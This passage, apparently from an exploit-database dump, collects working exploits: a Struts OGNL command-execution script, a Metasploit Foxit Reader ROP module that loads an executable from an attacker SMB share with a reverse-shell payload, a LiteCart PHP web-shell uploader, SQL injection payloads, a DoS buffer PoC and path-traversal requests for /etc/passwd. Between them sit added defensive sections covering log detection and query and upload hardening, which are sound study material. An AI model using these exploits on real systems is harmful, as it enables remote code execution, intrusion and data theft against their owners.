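               for a, b in zip(text, text[1:]))


def sanitize_irc_line(line: str) -> str:
    """Apply the normalization to the trailing parameter of an IRC line (the text after
    the first ' :'), leaving prefix, command and target untouched."""
    head, sep, trailing = line.partition(" :")
    if not sep:
        return line
    return head + sep + normalize_variation_selectors(trailing)


if __name__ == "__main__":
    # Constructed PRIVMSG carrying the advisory's sequence.
    raw = ":someone!u@h PRIVMSG someuser :\u2665\ufe0e\ufe0f"
    print("stacked selectors:", has_stacked_variation_selectors(raw))
    print("sanitized:", sanitize_irc_line(raw).encode("unicode_escape").decode())
```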
            
# Exploit Title: Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-26
# Vendor Homepage: https://www.trendmicro.com/en_se/business/products/user-protection/sps/mobile.html
# Software Link: App Store for iOS devices
# Tested Version: 2.0.0.1700
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Enterprise_Mobile_Security_2.0.0.1700.py
# 2.- Copy content to clipboard
# 3.- Open App Enterprise Mobile Security
# 4.- Inscribirse manualmente
# 5.- Servidor local
# 6.- Paste ClipBoard on "Servidor:"
# 7.- Puerto: 80
# 8.- Siguiente
# 9.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 153844
print (buffer)
            
#!/usr/bin/python
# -*- coding: utf-8 -*-

# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

import sys
import urllib
import urllib2
import httplib


def exploit(host,cmd):
    print "[Execute]: {}".format(cmd)

    ognl_payload = "${"
    ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
    ognl_payload += "(#cmd='{}').".format(cmd)
    ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
    ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    ognl_payload += "(#p.redirectErrorStream(true))."
    ognl_payload += "(#process=#p.start())."
    ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    ognl_payload += "(#ros.flush())"
    ognl_payload += "}"

    if not ":" in host:
        host = "{}:8080".format(host)

    # encode the payload
    ognl_payload_encoded = urllib.quote_plus(ognl_payload)

    # further encoding
    url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))

    print "[Url]: {}\n\n\n".format(url)

    try:
        request = urllib2.Request(url)
        response = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        response = e.partial
    print response


if len(sys.argv) < 3:
    sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
    exploit(sys.argv[1],sys.argv[2])
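Both Struts S2-057 scripts above (struts-pwn and the hook-s3c script) place the OGNL expression in a URL path segment: struts-pwn first probes with ${NN*NN} and looks for the product in a redirect's Location header, and both then send a ${...} payload carrying #_memberAccess and Java class references. The Python example below is added detection logic, not from either script: it parses constructed combined-format access log lines, percent-decodes the path with bounded repetition to unmask double encoding, and flags probe arithmetic, expression delimiters and OGNL markers in any path segment. The log lines and client address are constructed.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Strings that appear in the OGNL payloads of both scripts above.
OGNL_MARKERS = (
    "#_memberAccess",
    "allowStaticMethodAccess",
    "@java.lang.Runtime@",
    "java.lang.ProcessBuilder",
    "@org.apache.struts2.ServletActionContext@",
)
# struts-pwn's detection probe: ${NN*NN} in a path segment.
PROBE_RE = re.compile(r"\$\{\s*\d+\s*\*\s*\d+\s*\}")
# Any OGNL expression delimiter in a path segment (Struts evaluates both ${ and %{).
EXPR_RE = re.compile(r"[$%]\{")
# Enough of the combined/common log format to get client, request path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) ')


def decode_path(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly, but boundedly, so %2524%257B (double-encoded ${) is
    unmasked without looping on pathological input."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request_path(path: str) -> List[str]:
    """Return the findings for one request path; empty when nothing OGNL-like is present.
    Only the path is inspected, not the query string, since S2-057 lives in the namespace segment."""
    decoded = decode_path(path).split("?", 1)[0]
    findings: List[str] = []
    for segment in decoded.split("/"):
        if PROBE_RE.search(segment):
            findings.append("ognl-probe")
        elif EXPR_RE.search(segment):
            findings.append("ognl-expression-in-path")
        findings.extend("ognl-marker:" + m for m in OGNL_MARKERS if m in segment)
    return findings


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str, List[str]]]:
    """Run the classifier over log lines; each alert is (client, status, raw path, findings)."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request_path(m.group("path"))
        if findings:
            alerts.append((m.group("ip"), m.group("status"), m.group("path"), findings))
    return alerts


# Constructed log lines: a benign request, a struts-pwn style probe (the 302 whose Location
# carries the product is the confirmation signal the script looks for), a double-encoded
# probe, and a truncated payload of the kind the hook-s3c script builds.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Aug/2018:10:14:32 +0000] "GET /demo/struts2-showcase/index.action HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Aug/2018:10:14:33 +0000] "GET /demo/struts2-showcase/$%7B42*42%7D/index.action HTTP/1.1" 302 0',
    '203.0.113.5 - - [26/Aug/2018:10:14:34 +0000] "GET /demo/%2524%257B7*7%257D/index.action HTTP/1.1" 302 0',
    '203.0.113.5 - - [26/Aug/2018:10:14:35 +0000] "GET /%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29%7D/help.action HTTP/1.1" 200 1337',
]


if __name__ == "__main__":
    for ip, status, path, findings in scan_access_log(SAMPLE_LOG):
        print(ip, status, path[:60], findings)
```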
            
# Exploit Title: Sentrifugo HRMS 3.2 - 'deptid' SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-08-26
# Google Dork: N/A
# Vendor: http://www.sapplica.com
# Software Link: http://www.sentrifugo.com/download
# Affected Version: 3.2 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
 
# 1. Technical Description:
# Sentrifugo HRMS version 3.2 and possibly earlier is affected by a blind SQL injection in the deptid
# parameter of POST requests to the "/index.php/servicedeskconf/getemployees/format/html" resource.
# This allows a user of the application without permissions to read sensitive information from
# the database used by the application.
  
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the application (a single ' in the deptid parameter)

POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

bunitid=0&deptid='&reqfor=2

# 2.2 In a second request, two ' in the same parameter yield a 200 OK

POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

bunitid=0&deptid=''&reqfor=2

# 3. Payload:

Parameter: deptid (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: bunitid=0&deptid=(SELECT (CASE WHEN (5610=5610) THEN 5610 ELSE 5610*(SELECT 5610 FROM INFORMATION_SCHEMA.PLUGINS) END))&reqfor=2

# 4. Reference:
# https://hackpuntes.com/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/
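The Gift Voucher and Sentrifugo entries above are the same defect in two shapes: a request parameter spliced into a query string, so that 1 AND 4448=4448 changes the result set and a lone ' produces a 500 while '' produces a 200. The Python/sqlite3 example below is added and is not from either project: it reproduces both oracles against a constructed schema and shows how type validation plus parameter binding removes them (the equivalent inside the WordPress plugin would be $wpdb->prepare()). The MySQL time-based sleep(15) payload is not reproduced because sqlite has no sleep() function.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the plugin's template table and the HRMS employee table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE templates (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO templates VALUES (1, 'Birthday'), (2, 'Holiday');
        CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, dept_id INTEGER);
        INSERT INTO employees VALUES (1, 'Alice', 10), (2, 'Bob', 20);
    """)
    return conn


def run(conn: sqlite3.Connection, sql: str, params: tuple = ()) -> Tuple[int, List]:
    """Execute and map the outcome onto what the two applications returned:
    200 with the rows on success, 500 with nothing when the database raised an error."""
    try:
        return 200, conn.execute(sql, params).fetchall()
    except sqlite3.Error:
        return 500, []


def gift_voucher_template(conn: sqlite3.Connection, template_id: str, hardened: bool) -> Tuple[int, List]:
    """Lookup keyed by template_id (the Gift Voucher plugin's POST parameter)."""
    if hardened:
        # Whitelist the type first (it is a numeric id), then bind; '1 AND 4448=4448' never reaches SQL.
        if not template_id.isdigit():
            return 400, []
        return run(conn, "SELECT id, name FROM templates WHERE id = ?", (int(template_id),))
    # Vulnerable shape: the raw parameter is spliced into the statement.
    return run(conn, "SELECT id, name FROM templates WHERE id = " + template_id)


def sentrifugo_employees(conn: sqlite3.Connection, dept_id: str, hardened: bool) -> Tuple[int, List]:
    """Lookup keyed by deptid (Sentrifugo's POST parameter)."""
    if hardened:
        if not dept_id.isdigit():
            return 400, []
        return run(conn, "SELECT name FROM employees WHERE dept_id = ?", (int(dept_id),))
    return run(conn, "SELECT name FROM employees WHERE dept_id = " + dept_id)


def boolean_oracle_present(conn: sqlite3.Connection, hardened: bool) -> bool:
    """The Gift Voucher finding: a true and a false condition appended to a valid id yield
    different responses. Present when the two responses differ."""
    true_case = gift_voucher_template(conn, "1 AND 4448=4448", hardened)
    false_case = gift_voucher_template(conn, "1 AND 4448=4449", hardened)
    return true_case != false_case


def quote_oracle_present(conn: sqlite3.Connection, hardened: bool) -> bool:
    """The Sentrifugo finding (steps 2.1 and 2.2): one quote gives a 500, two quotes give a 200.
    Present when the status codes differ."""
    one_quote = sentrifugo_employees(conn, "'", hardened)[0]
    two_quotes = sentrifugo_employees(conn, "''", hardened)[0]
    return one_quote != two_quotes


if __name__ == "__main__":
    db = make_db()
    for hardened in (False, True):
        label = "hardened" if hardened else "vulnerable"
        print(label, "boolean oracle:", boolean_oracle_present(db, hardened),
              "quote oracle:", quote_oracle_present(db, hardened))
```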
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name' => 'Foxit PDF Reader Pointer Overwrite UAF',
      'Description' => %q{
        Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability
        in the Text Annotations component, and its TypedArray objects use
        uninitialized pointers.

        The vulnerabilities can be combined to leak a vtable memory address,
        which can be adjusted to point to the base address of the executable.
        A ROP chain can be constructed that will execute when Foxit Reader
        performs the UAF.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'mr_me',            # Use-after-free and PoC
          'bit from meepwn',  # Uninitialized pointer
          'saelo',            # JavaScript Garbage Collector
          'Jacob Robles'      # Metasploit Module
        ],
      'References' =>
        [
          ['CVE', '2018-9948'],
          ['CVE', '2018-9958'],
          ['ZDI', '18-332'],
          ['ZDI', '18-342'],
          ['URL', 'https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html'],
          ['URL', 'https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt']
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => true,
          'FILENAME' => 'test.pdf',
          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['Windows 10 Pro x64 Build 17134', {}]
        ],
      'DisclosureDate' => 'Apr 20 2018',
      'DefaultTarget' => 0))

    register_options([
      OptString.new('EXENAME', [false, 'EXE file to download', '']),
      OptString.new('SHARE', [false, 'SMB share hosting exe', ''])
    ])
  end

  def pdfdoc
    share = datastore['SHARE'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}" : datastore['SHARE']
    fname = datastore['EXENAME'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}.exe" : datastore['EXENAME']
    fname << '.exe' unless fname.ends_with?('.exe')

    share_path = "\\\\#{datastore['LHOST']}\\#{share}\\#{fname}"
    num = 4 - (share_path.length % 4)
    share_path << "\x00"*num
    return nil if share_path.length > 44

    print_status("share_path: #{share_path}")

    rop = ''
    max_index = 0
    share_path.unpack('V*').each_with_index {|blk, index|
      rop << "\nrop[0x%02x] = 0x%08x" % [index+12, blk]
      max_index = index
    }

    (max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000" % (i+12)}

    <<~PDFDOC
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (

var heap_ptr   = 0;
var foxit_base = 0;
var pwn_array  = [];

function prepare_heap(size){
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
        arr[i] = this.addAnnot({type: "Text"});;
        if (typeof arr[i] == "object"){
            arr[i].destroy();
        }
    }
}

function gc() {
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

function alloc_at_leak(){
    for (var i = 0; i < 0x64; i++){
        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    }
}

function control_memory(){
    for (var i = 0; i < 0x64; i++){
        for (var j = 0; j < pwn_array[i].length; j++){
            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
        }
    }
}

function leak_vtable(){
    var a = this.addAnnot({type: "Text"});

    a.destroy();
    gc();

    prepare_heap(0x400);
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    var leaked = stolen[0] & 0xffff0000;
    foxit_base = leaked - 0x01f50000;
}

function leak_heap_chunk(){
    var a = this.addAnnot({type: "Text"});
    a.destroy();
    prepare_heap(0x400);

    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    alloc_at_leak();
    heap_ptr = stolen[1];
}

function reclaim(){
    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arr[i] = new ArrayBuffer(0x60);
        var rop = new Int32Array(arr[i]);

        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
        rop[0x02] = 0x72727272;              // junk
        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
        rop[0x04] = 0xffffffff;              // ret of WinExec
        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
        #{rop}
        rop[0x17] = 0x00000000;              // adios, amigo
    }
}

function trigger_uaf(){
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
        "0":{
            get: function () {

                that.getAnnot(0, "uaf").destroy();

                reclaim();
                return 1;
            }
        }
    });

    a.point = arr;
}

function main(){
    leak_heap_chunk();
    leak_vtable();
    control_memory();
    trigger_uaf();
}

if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
        if (app.appFoxitVersion == "9.0.1.1049"){
            main();
        }
    }
}

)>> trailer <</Root 1 0 R>>
    PDFDOC
  end

  def exploit
    mypdf = pdfdoc
    if mypdf.nil?
      fail_with(Failure::BadConfig, 'The generated share path was greater than 44 bytes.')
    end
    file_create(mypdf)
  end
end
            
# Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload
# Date: 2018-08-27
# Exploit Author: Haboob Team
# Software Link: https://www.litecart.net/downloading?version=2.1.2
# Version: 2.1.2
# CVE : CVE-2018-12256

# 1. Description
# admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers 
# to upload a malicious file (resulting in remote code execution) by using the text/xml 
# or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request.
 
# 2. Proof of Concept
 
#!/usr/bin/env python
import mechanize
import cookielib
import urllib2
import requests
import sys
import argparse
import random
import string
parser = argparse.ArgumentParser(description='LiteCart')
parser.add_argument('-t',
                    help='admin login page url - EX: https://IPADDRESS/admin/')
parser.add_argument('-p',
                    help='admin password')
parser.add_argument('-u',
                    help='admin username')
args = parser.parse_args()
if(not args.u or not args.t or not args.p):
    sys.exit("-h for help")
url = args.t
user = args.u
password = args.p

br = mechanize.Browser()
cookiejar = cookielib.LWPCookieJar()
br.set_cookiejar( cookiejar )
br.set_handle_equiv( True )
br.set_handle_redirect( True )
br.set_handle_referer( True )
br.set_handle_robots( False )
br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ]
response = br.open(url)
br.select_form(name="login_form")
br["username"] = user
br["password"] = password
res = br.submit()
response = br.open(url + "?app=vqmods&doc=vqmods")
one=""
for form in br.forms():
    one= str(form).split("(")
    one= one[1].split("=")
    one= one[1].split(")")
    one = one[0]
cookies = br._ua_handlers['_cookies'].cookiejar
cookie_dict = {}
for c in cookies:
    cookie_dict[c.name] = c.value
rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
files = {
        'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"),
        'token':one,
        'upload':(None,"Upload")
    }
response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict)
r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id")
if r.status_code == 200:
    print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id"
    print r.content
else:
    print "Sorry something went wrong"
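The upload check that makes this work is a decision taken on the client-supplied Content-Type, which the exploit above simply sets to application/xml while sending a .php body. The Python below is an added example, not LiteCart's code (which is PHP): the first function reproduces that decision as the advisory describes it, the second bases the decision only on things the client cannot choose freely (a bare .xml file name and a body that actually parses as a vQmod document, whose root element is <modification>) and stores the file under a generated name. The file names and bodies in the usage are constructed.

```python
import os
import uuid
import xml.etree.ElementTree as ET

# Constructed upload records stand in for the multipart fields of the
# ?app=vqmods&doc=vqmods POST. The client controls all three values,
# including the Content-Type, which is why the first check below is useless.

XML_TYPES = ("text/xml", "application/xml")

def accept_vqmod_as_shipped(filename, content_type, data):
    """The flaw the advisory describes: the decision rests on the client-supplied
    Content-Type, so a .php body sent as application/xml is accepted."""
    return content_type in XML_TYPES

def accept_vqmod_hardened(filename, content_type, data):
    """Decision that ignores the client's Content-Type: bare file name, .xml
    extension, and a body that really parses as a vQmod <modification> document."""
    name = os.path.basename(filename)
    if not name or name != filename or name.startswith("."):
        return False
    if os.path.splitext(name)[1].lower() != ".xml":
        return False
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    return root.tag == "modification"

def stored_name():
    """Name used on disk: never derived from the upload, always .xml."""
    return uuid.uuid4().hex + ".xml"

def handle_upload(filename, content_type, data, checker=accept_vqmod_hardened):
    """Returns the on-disk name when the upload is accepted, else None."""
    if not checker(filename, content_type, data):
        return None
    return stored_name()

if __name__ == "__main__":
    shell = b"<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>"
    print("as shipped:", accept_vqmod_as_shipped("X7Q2K.php", "application/xml", shell))
    print("hardened:  ", accept_vqmod_hardened("X7Q2K.php", "application/xml", shell))
```

A body of `<?php ... ?>` is a bare XML processing instruction with no root element, so even a correctly named upload carrying PHP fails the parse; the shell from the exploit is rejected by the hardened check on extension before its content is examined.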
            
The attached fuzz file causes an out-of-bounds read in AVC processing. To reproduce the issue, put both attached files on a server and visit:

http://127.0.0.1/LoadMP4.swf?file=transpose.mp4

This issue reproduces on Chrome and Firefox for Linux. 


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45268.zip
            
------------------------------------------------------------------------
Seagate Media Server multiple SQL injection vulnerabilities
------------------------------------------------------------------------
Yorick Koster, September 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Seagate Personal Cloud is a consumer-grade Network-Attached Storage
device (NAS). It was found that Seagate Media Server is affected by
multiple SQL injection vulnerabilities. An unauthenticated attacker can
exploit this issue to retrieve or modify arbitrary data in the database
used by Seagate Media Server. Seagate Media Server uses a separate
SQLite3 database, which limits what the attacker can do with this issue.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was tested on a Seagate Personal Cloud model SRN21C running
firmware versions 4.3.16.0 and 4.3.18.0. It is likely that other
devices/models are also affected.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
These vulnerabilities have been fixed in firmware version 4.3.19.3.
http://knowledge.seagate.com/articles/en_US/FAQ/007752en

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2017/seagate-media-server-multiple-sql-injection-vulnerabilities.html

Seagate Media Server uses the Django web framework and is mapped to the .psp extension. Any URL that ends with .psp is automatically sent to the Seagate Media Server application using the FastCGI protocol.

/etc/lighttpd/conf.d/django-host.conf:

fastcgi.server += (
".psp"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   )),
".psp/"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   ))
)

URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. It was found that many views contain SQL injection vulnerabilities. Since the number of issues is large, only a selection of the identified issues is listed below.


/usr/lib/python2.7/site-packages/sms/Doc/core/documentSort.py (insecure use of format):

searchResult = self.dbObj.execute_command(RequestType.GETDICT, searchQuery.format(orderby = orderby,order = order,startwith_construct=startwith_construct), params = paramdict, priority = PriorityLevel.UI)
[...]
searchQuery = "Select id as UID, id, name, url, thumbUrl, size, approxFileSize, creationTime, approxCreationTime, type, extension, views, " \
            "SUBSTR(album, 0, length(album) - 32) AS album, album AS albumId," \
            "dirId, title as dtitle, dropboxSync , googleDriveSync from doc where album like :name escape '|' order by {orderby} {order} LIMIT :offset offset :start".format(orderby = orderby,order = order)

            
/usr/lib/python2.7/site-packages/sms/FolderView/core/Folder.py (unsafe string concatenation):

def allfiles(self, start, count, order, uid, orderby, folderOnly):
   dirOrderby = "name"
   
   if orderby == "creationTime":
      dirOrderby = "creationTime"
   
   countdirectory = "SELECT count(id) FROM directories WHERE parentdirId= '" + uid + "'"
   dcount = 0
   result = self.dbObj.execute_command(RequestType.GETONE, countdirectory, priority = PriorityLevel.UI)
   if result:
      dcount = result["data"]["result"][0]
   count = int(count)
   start = int(start)
   tcount = start + count
   if start <= dcount:
      if tcount > dcount:
         ocount = tcount - dcount
         searchfolder = "SELECT id, name, url, parentdirId, creationTime, thumbUrl FROM directories WHERE parentdirId= '" + uid + "' ORDER BY " + dirOrderby + " " + order + " LIMIT " + str(count) + " OFFSET " + str(start)

Similar issues were observed in the following files (non-exhaustive list):

- /usr/lib/python2.7/site-packages/sms/Music/core/musicSort.py
- /usr/lib/python2.7/site-packages/sms/Music/views.py
- /usr/lib/python2.7/site-packages/sms/Photo/core/photoSort.py
- /usr/lib/python2.7/site-packages/sms/Photo/views.py
- /usr/lib/python2.7/site-packages/sms/Video/core/videoSort.py
- /usr/lib/python2.7/site-packages/sms/Video/views.py

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------

The following proof of concept can be used to verify this issue.

http://personalcloud.local/folderViewAllFiles.psp?start=0&count=60&url=%2F&dirId=\'+union+select+null,name,null,sql,null,null+from+sqlite_master+--+'
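The two code shapes quoted above (.format() of the ORDER BY clause and plain concatenation of uid) are reproduced below in a small sqlite3 script so the PoC payload can be run offline. This is an added example, not Seagate's code: the schema is constructed from the column names in Folder.allfiles() plus a second table to show what a UNION reaches, and the fixed variant uses bind parameters for values and allowlists for the sort column and direction.

```python
import sqlite3

# Constructed stand-in for the Seagate Media Server SQLite database: only the
# columns that Folder.allfiles() reads, plus a second table to show what a
# UNION-based injection can reach. The real schema is not on the page.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE directories (
            id INTEGER PRIMARY KEY, name TEXT, url TEXT, parentdirId TEXT,
            creationTime INTEGER, thumbUrl TEXT);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO directories VALUES (1, 'Photos', '/Photos', 'root-uid', 1, NULL);
        INSERT INTO directories VALUES (2, 'Music',  '/Music',  'root-uid', 2, NULL);
        INSERT INTO secrets VALUES (1, 'constructed-secret');
    """)
    return db

def allfiles_vulnerable(db, uid, order, count, start):
    # Same construction as Folder.allfiles(): uid and order are pasted into the
    # statement text, so a quote in uid ends the literal and the rest is SQL.
    sql = ("SELECT id, name, url, parentdirId, creationTime, thumbUrl FROM directories "
           "WHERE parentdirId= '" + uid + "' ORDER BY name " + order +
           " LIMIT " + str(count) + " OFFSET " + str(start))
    return db.execute(sql).fetchall()

# Identifiers and keywords cannot be bound as parameters; they come from
# allowlists instead, and an unknown key raises KeyError rather than reaching SQL.
ORDER_BY_ALLOWED = {"name": "name", "creationTime": "creationTime"}
ORDER_ALLOWED = {"asc": "ASC", "desc": "DESC"}

def allfiles_fixed(db, uid, orderby, order, count, start):
    sql = ("SELECT id, name, url, parentdirId, creationTime, thumbUrl FROM directories "
           "WHERE parentdirId = :uid ORDER BY {orderby} {order} "
           "LIMIT :count OFFSET :start").format(
               orderby=ORDER_BY_ALLOWED[orderby], order=ORDER_ALLOWED[order.lower()])
    # uid, count and start travel as bind parameters and are never parsed as SQL.
    return db.execute(sql, {"uid": uid, "count": int(count), "start": int(start)}).fetchall()

if __name__ == "__main__":
    db = build_db()
    # The dirId payload from the PoC URL above, URL-decoded.
    payload = "' union select null,name,null,sql,null,null from sqlite_master -- '"
    for row in allfiles_vulnerable(db, payload, "ASC", 60, 0):
        print("leaked:", row[1], "->", row[3])
    print("fixed:", allfiles_fixed(db, payload, "name", "asc", 60, 0))
```

Run against the in-memory database, the vulnerable function returns the CREATE statement of every table for the payload from the PoC URL, while the fixed function returns no rows for it and refuses an unexpected sort direction with a KeyError before any SQL is built.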
            
The following Responsive FileManager vulnerabilities were fixed in version 9.13.4.
https://responsivefilemanager.com

#1 Path Traversal Allows to Read Any File

Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed

Details:

The following request allows a user to read any file on the system.

    GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
    Host: 192.168.5.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
    X-Requested-With: XMLHttpRequest
    Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
    Connection: close

#2 Path Traversal While Unpacking Archives

Reserved CVE: CVE-2018-15536
Discovered By: Simon Uvarov
Vendor Status: Fixed

The following request starts unpacking the exploit.zip archive:

    POST /filemanager/ajax_calls.php?action=extract HTTP/1.1
    Host: 192.168.5.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.5.129/filemanager/dialog.php?type=0&lang=en_EN&popup=1&crossdomain=0&relative_url=0&akey=key&fldr=&5b6d9b91535a9&1533909952983
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
